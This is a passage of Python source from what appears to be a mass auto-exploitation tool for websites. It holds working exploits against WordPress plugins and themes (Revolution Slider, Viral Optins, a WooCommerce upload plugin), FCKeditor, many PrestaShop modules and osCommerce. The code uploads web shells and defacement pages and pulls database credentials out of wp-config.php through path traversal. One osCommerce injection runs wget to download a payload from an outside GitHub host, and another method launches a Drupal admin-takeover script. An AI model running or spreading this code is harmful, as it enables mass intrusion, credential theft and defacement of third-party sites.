'/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev7.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/cuckootap/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev8 = requests.get('http://' + site +
'/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev8.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/pindol/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev9 = requests.get('http://' + site +
'/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev9.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(site + '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/designplus/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev10 = requests.get('http://' + site +
'/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev10.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/rarebird/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev11 = requests.get('http://' + site +
'/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev11.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/Avada/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev12 = requests.get('http://' + site +
'/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev12.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
else:
self.Print_NotVuln('revslider', site)
except:
self.Print_NotVuln('revslider', site)
def Revslider_Config(self, site):
try:
Exp = 'http://' + site + \
'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
GetConfig = requests.get(Exp, timeout=5)
if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
self.Revslider_css(site)
except:
self.Revslider_css(site)
else:
self.Revslider_css(site)
except:
self.Revslider_css(site)
def viral_optins(self, site):
try:
defaceFile = {
'Filedata': ('vuln.txt', open(self.TextindeX, 'rb'), 'text/html')
}
x = requests.post('http://' + site + '/wp-content/plugins/viral-optins/api/uploader/file-uploader.php',
files=defaceFile, timeout=5)
if 'id="wpvimgres"' in x.text.encode('utf-8'):
uploader = site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt'
GoT = requests.get('http://' + uploader, timeout=5)
find = re.findall('<img src="http://(.*)" height="', x.text.encode('utf-8'))
GoT2 = requests.get('http://' + find[0], timeout=5)
print find[0]
if 'Vuln!!' in GoT.text.encode('utf-8'):
self.Print_Vuln_index(site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt' + '\n')
elif 'Vuln!!' in GoT2.text.encode('utf-8'):
self.Print_Vuln_index(find[0])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + find[0] + '\n')
else:
self.Print_NotVuln('viral optins', site)
else:
self.Print_NotVuln('viral optins', site)
except:
self.Print_NotVuln('viral optins', site)
def Woocomrece(self, site):
try:
Exp = 'http://' + site + '/wp-admin/admin-ajax.php'
Postdata = {'action': 'nm_personalizedproduct_upload_file', 'name': 'upload.php'}
FileData = {'file': (self.pagelinesExploitShell.split('/')[1], open(self.pagelinesExploitShell, 'rb'),
'multipart/form-data')}
GoT = requests.post(Exp, files=FileData, data=Postdata, timeout=5)
if GoT.status_code == 200 or 'success' in GoT.text.encode('utf-8'):
UploadPostPath = 'http://' + site + '/wp-content/uploads/product_files/upload.php'
CheckShell = requests.get(UploadPostPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
shellChecker = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
if 'Vuln!!' in shellChecker.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in IndexCheck.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('Woocomrece', site)
else:
self.Print_NotVuln('Woocomrece', site)
else:
self.Print_NotVuln('Woocomrece', site)
except:
self.Print_NotVuln('Woocomrece', site)
def FckPath(self, zzz):
try:
find = re.findall(',"(.*)","', zzz)
path = find[0].strip()
return path
except:
pass
def FckEditor(self, site):
try:
exp2 = '/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media'
try:
CheckVuln = requests.get('http://' + site + exp2, timeout=5)
if 'OnUploadCompleted(202' in CheckVuln.text.encode('utf-8'):
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
'Accept': '*/*'}
exp = 'http://' + site + exp2
po = {'Content_Type': 'form-data'}
fil = {'NewFile': open(self.Jce_Deface_image, 'rb')}
rr = requests.post(exp, data=po, headers=headers, timeout=10, files=fil)
if '.gif' in rr.text.encode('utf-8'):
zart = self.FckPath(rr.text.encode('utf-8'))
x = 'http://' + site + str(zart)
wcheck2 = requests.get(x, timeout=5)
if wcheck2.status_code == 200:
check_deface = requests.get(x, timeout=10)
if 'GIF89a' in check_deface.text.encode('utf-8'):
self.Print_Vuln_index(site + str(zart))
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + str(zart) + '\n')
else:
self.Print_NotVuln('fckeditor', site)
else:
self.Print_NotVuln('fckeditor', site)
else:
self.Print_NotVuln('fckeditor', site)
else:
self.Print_NotVuln('fckeditor', site)
except:
self.Print_NotVuln('fckeditor', site)
except:
self.Print_NotVuln('fckeditor', site)
def Drupal_Sqli_Addadmin(self, site):
os.system('python files/adminTakeoverdupal.py -t http://' + site + ' -u pwndrupal -p pwndrupal')
def osCommerce(self, site):
try:
CheckVuln = requests.get('http://' + site + '/install/index.php', timeout=5)
if 'Welcome to osCommerce' in CheckVuln.text.encode('utf-8') or CheckVuln.status_code == 200:
Exp = site + '/install/install.php?step=4'
data = {
'DIR_FS_DOCUMENT_ROOT': './'
}
shell = '\');'
shell += 'system("wget https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/OsComPayLoad.php");'
shell += '/*'
deface = '\');'
deface += 'system("echo Vuln!! patch it Now!> ../../vuln.htm");'
deface += '/*'
data['DB_DATABASE'] = deface
r = requests.post(url='http://' + Exp, data=data, timeout=5)
if r.status_code == 200:
requests.get('http://' + site + '/install/includes/configure.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.txt' + '\n')
try:
data['DB_DATABASE'] = shell
requests.post(url='http://' + Exp, data=data, timeout=5)
requests.get('http://' + site + '/install/includes/configure.php', timeout=5)
requests.get('http://' + site + '/install/includes/OsComPayLoad.php', timeout=5)
Checkshell = requests.get('http://' + site + '/install/includes/vuln.php', timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
except:
pass
else:
self.Print_NotVuln('osCommerce RCE', site)
else:
self.Print_NotVuln('osCommerce RCE', site)
else:
self.Print_NotVuln('osCommerce RCE', site)
except:
self.Print_NotVuln('osCommerce RCE', site)
def columnadverts(self, site):
try:
Exp = site + '/modules/columnadverts/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/columnadverts/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/columnadverts/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + ShellPath + '\n')
else:
self.Print_NotVuln('columnadverts', site)
else:
self.Print_NotVuln('columnadverts', site)
except:
self.Print_NotVuln('columnadverts', site)
def soopamobile(self, site):
try:
Exp = site + '/modules/soopamobile/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/soopamobile/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/soopamobile/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('soopamobile', site)
else:
self.Print_NotVuln('soopamobile', site)
except:
self.Print_NotVuln('soopamobile', site)
def soopabanners(self, site):
try:
Exp = site + '/modules/soopabanners/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/soopabanners/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/soopabanners/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('soopabanners', site)
else:
self.Print_NotVuln('soopabanners', site)
except:
self.Print_NotVuln('soopabanners', site)
def vtermslideshow(self, site):
try:
Exp = site + '/modules/vtermslideshow/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/vtermslideshow/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/vtermslideshow/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('vtermslideshow', site)
else:
self.Print_NotVuln('vtermslideshow', site)
except:
self.Print_NotVuln('vtermslideshow', site)
def simpleslideshow(self, site):
try:
Exp = site + '/modules/simpleslideshow/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/simpleslideshow/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/simpleslideshow/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('simpleslideshow', site)
else:
self.Print_NotVuln('simpleslideshow', site)
except:
self.Print_NotVuln('simpleslideshow', site)
def productpageadverts(self, site):
try:
Exp = site + '/modules/productpageadverts/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/productpageadverts/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/productpageadverts/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('productpageadverts', site)
else:
self.Print_NotVuln('productpageadverts', site)
except:
self.Print_NotVuln('productpageadverts', site)
def homepageadvertise(self, site):
try:
Exp = site + '/modules/homepageadvertise/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/homepageadvertise/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/homepageadvertise/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('homepageadvertise', site)
else:
self.Print_NotVuln('homepageadvertise', site)
except:
self.Print_NotVuln('homepageadvertise', site)
def homepageadvertise2(self, site):
try:
Exp = site + '/modules/homepageadvertise2/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/homepageadvertise2/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/homepageadvertise2/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('homepageadvertise2', site)
else:
self.Print_NotVuln('homepageadvertise2', site)
except:
self.Print_NotVuln('homepageadvertise2', site)
def jro_homepageadvertise(self, site):
try:
Exp = site + '/modules/jro_homepageadvertise/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/jro_homepageadvertise/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/jro_homepageadvertise/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('jro_homepageadvertise', site)
else:
self.Print_NotVuln('jro_homepageadvertise', site)
except:
self.Print_NotVuln('jro_homepageadvertise', site)
def attributewizardpro(self, site):
try:
Exp = site + '/modules/attributewizardpro/file_upload.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
Index = GoT.text.encode('utf-8').split('|||')[0]
print Index
IndexPath = site + '/modules/attributewizardpro/file_uploads/' + Index
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
Shell = Got2.text.encode('utf-8').split('|||')[0]
ShellPath = site + '/modules/attributewizardpro/file_uploads/' + Shell
CheckShell = requests.get('http://' + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('attributewizardpro', site)
else:
self.Print_NotVuln('attributewizardpro', site)
except:
self.Print_NotVuln('attributewizardpro', site)
def attributewizardpro2(self, site):
try:
Exp = site + '/modules/1attributewizardpro/file_upload.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
Index = GoT.text.encode('utf-8').split('|||')[0]
print Index
IndexPath = site + '/modules/1attributewizardpro/file_uploads/' + Index
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
Shell = Got2.text.encode('utf-8').split('|||')[0]
ShellPath = site + '/modules/1attributewizardpro/file_uploads/' + Shell
CheckShell = requests.get('http://' + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('1attributewizardpro', site)
else:
self.Print_NotVuln('1attributewizardpro', site)
except:
self.Print_NotVuln('1attributewizardpro', site)
def attributewizardpro3(self, site):
try:
Exp = site + '/modules/attributewizardpro.OLD/file_upload.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
Index = GoT.text.encode('utf-8').split('|||')[0]
print Index
IndexPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Index
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
Shell = Got2.text.encode('utf-8').split('|||')[0]
ShellPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Shell
CheckShell = requests.get('http://' + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('attributewizardpro.OLD', site)
else:
self.Print_NotVuln('attributewizardpro.OLD', site)
except:
self.Print_NotVuln('attributewizardpro.OLD', site)
def attributewizardpro_x(self, site):
try:
Exp = site + '/modules/attributewizardpro_x/file_upload.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
Index = GoT.text.encode('utf-8').split('|||')[0]
print Index
IndexPath = site + '/modules/attributewizardpro_x/file_uploads/' + Index
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
Shell = Got2.text.encode('utf-8').split('|||')[0]
ShellPath = site + '/modules/attributewizardpro_x/file_uploads/' + Shell
CheckShell = requests.get('http://' + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('attributewizardpro_x', site)
else:
self.Print_NotVuln('attributewizardpro_x', site)
except:
self.Print_NotVuln('attributewizardpro_x', site)
def advancedslider(self, site):
try:
Exp = site + '/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php'
Checkvuln = requests.get('http://' + Exp, timeout=5)
FileDataIndex = {'qqfile': open(self.Jce_Deface_image, 'rb')}
if Checkvuln.status_code == 200:
requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
IndexPath = site + '/modules/advancedslider/uploads/' + self.Jce_Deface_image.split('/')[1]
